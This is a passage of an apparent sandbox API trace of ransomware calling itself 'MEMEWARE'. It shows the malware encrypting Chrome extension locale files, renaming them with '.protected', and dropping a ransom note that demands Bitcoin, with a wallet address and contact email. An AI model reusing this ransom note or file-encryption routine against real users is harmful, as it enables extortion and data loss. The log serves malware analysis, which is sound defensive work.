(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.056] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.056] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.056] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.056] CloseHandle (hObject=0x164) returned 1 [0079.056] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned 144 [0079.057] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0079.057] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*") returned 146 [0079.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.057] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.057] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.057] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.057] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\.") returned 146 [0079.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.057] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.057] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.057] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.057] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.057] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\..") returned 147 [0079.057] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.057] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.057] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.057] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.058] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.058] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.058] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.058] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.058] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.059] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.059] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.059] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.059] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.060] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.060] CloseHandle (hObject=0x168) returned 1 [0079.060] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0079.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0079.060] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.060] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.060] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0079.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.061] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.061] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.061] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.061] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.062] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.062] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.062] CloseHandle (hObject=0x164) returned 1 [0079.062] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0079.062] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned 144 [0079.062] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0079.062] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0079.062] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*") returned 146 [0079.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.062] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.062] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.062] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.062] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.062] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.062] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\.") returned 146 [0079.062] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.062] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.063] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.063] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.063] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.063] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.063] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.063] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\..") returned 147 [0079.063] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.063] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.063] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.063] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.063] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.063] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.063] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.063] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.063] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.064] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.064] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.064] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0079.065] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.065] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0079.065] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.065] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.065] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.065] CloseHandle (hObject=0x168) returned 1 [0079.065] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0079.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0079.065] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.066] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0079.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.066] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.066] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.067] lstrlenA 